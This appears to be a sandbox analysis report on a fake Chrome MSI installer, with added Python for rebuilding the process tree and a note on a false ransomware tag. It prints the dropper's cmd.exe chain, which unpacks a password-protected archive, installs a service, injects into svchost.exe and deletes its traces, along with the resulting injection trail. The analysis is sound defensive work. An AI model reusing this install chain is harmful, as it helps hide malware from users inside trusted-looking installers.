Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Packas\scrok.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2064 wrote to memory of 1832 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2064 wrote to memory of 1832 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2524 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 3800 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 3800 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2524 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 1256 wrote to memory of 2812 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 2812 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 568 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 568 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 968 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 968 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3832 wrote to memory of 3512 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
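
Reconstructing the process tree from the WriteProcessMemory rows above, as an added example (not the sandbox's own tooling). A parent that creates a child and writes into it shows up here as one or more "wrote to memory of" rows per child, so a freshly spawned child has a single writer. Two heuristics, both assumptions of this example: a PID written by several distinct source PIDs was already running when it was written (here PID 804, C:\Windows\system32\svchost.exe, written by both scrok.exe instances), and an image in a user-writable directory writing into a System32 image is not a normal parent/child launch. PIDs that are never a write target are the roots; in the table those are 2064 (msiexec.exe) and 2160 (TjNkNpAilaYvt.exe), the latter consistent with a start by the service control manager after the install/start commands rather than by cmd.exe. The rows below are a constructed subset of the table.

```python
"""Process tree and injection candidates from "PID X wrote to memory of Y"
rows. Added example; the heuristics are assumptions, not sandbox logic."""
import re
from collections import defaultdict

# Constructed subset of the WriteProcessMemory table (one deliberate duplicate).
SAMPLE_ROWS = r"""
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
"""

ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>[A-Za-z]:\\.+?) (?P<dst_img>[A-Za-z]:\\.+)$"
)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")   # assumed prefixes


def parse_edges(text):
    """De-duplicated (src_pid, dst_pid) edges plus a pid -> image path map."""
    edges, images, seen = [], {}, set()
    for line in text.strip().splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        src, dst = int(m["src"]), int(m["dst"])
        images.setdefault(src, m["src_img"])
        images.setdefault(dst, m["dst_img"])
        if (src, dst) not in seen:
            seen.add((src, dst))
            edges.append((src, dst))
    return edges, images


def build_tree(edges):
    """children[pid], writers[pid] (set of pids that wrote into it), and roots."""
    children, writers = defaultdict(list), defaultdict(set)
    for src, dst in edges:
        children[src].append(dst)
        writers[dst].add(src)
    roots = sorted({s for s, _ in edges} - set(writers))
    return children, writers, roots


def render(children, images, roots):
    """Indented tree; a pid reached through two parents is printed under both."""
    lines = []

    def walk(pid, depth, stack):
        lines.append("  " * depth + f"{pid} {images[pid]}")
        for child in children.get(pid, []):
            if child not in stack:          # guard against cyclic input
                walk(child, depth + 1, stack | {child})

    for root in roots:
        walk(root, 0, {root})
    return "\n".join(lines)


def injection_candidates(edges, images, writers):
    """(rule, target_pid, [writer pids]) for writes that do not look like a
    parent starting its own child (both rules are assumptions)."""
    findings = [("multiple-writers", dst, sorted(srcs))
                for dst, srcs in writers.items() if len(srcs) > 1]
    for src, dst in edges:
        if images[src].lower().startswith(USER_WRITABLE) and \
           images[dst].lower().startswith(SYSTEM_DIRS):
            findings.append(("user-dir-image-writes-system-image", dst, [src]))
    return findings


if __name__ == "__main__":
    edges, images = parse_edges(SAMPLE_ROWS)
    children, writers, roots = build_tree(edges)
    print(render(children, images, roots))
    for rule, pid, srcs in injection_candidates(edges, images, writers):
        print(f"{rule}: pid {pid} {images[pid]} written by {srcs}")
```

The tree makes the two chains in the table visible at a glance: msiexec.exe to the 32-bit MsiExec.exe custom action to cmd.exe to the dropped binaries, and a separate TjNkNpAilaYvt.exe chain that ends in C:\ProgramData\NVIDIARV\svchost.exe. The only write into a pre-existing process is scrok.exe into PID 804.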

Uses Volume Shadow Copy service COM API

ransomware

Note on the ransomware tag: the VSS activity in this run is vssvc.exe together with srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2 (see Processes below), which is Windows Installer creating a System Restore point before the MSI install. Nothing in the report shows shadow copies being enumerated or deleted, so the tag is a side effect of the installer, not evidence of ransomware behaviour.

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 999E5D24FED8004AF3E8170BB1DD2272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NENBMTBEMUYtQkVDOC00MTA3LUFBQkUtNzYyOERFNDczRTcxfSIgdXNlcmlkPSJ7MTg4MTg1Q0ItMDMzNC00REQ4LUFDNUItMkNCREEwNTA4NDc3fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezQwMENGQUY3LUVDMjctNDZCMS1BQjEyLUYxNjlGNjhGQjkwOX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zMTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7OUYwQzFGNDQtMUM1MC0zOTZBLTQ4M0EtMDhEQTQ4OTZGRjBCfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIyMTU2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{4CA10D1F-BEC8-4107-AABE-7628DE473E71}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\gui3919.tmp"

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\gui3919.tmp"

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x7ff67d16bed8,0x7ff67d16bee4,0x7ff67d16bef0

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x7ff67d16bed8,0x7ff67d16bee4,0x7ff67d16bef0

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

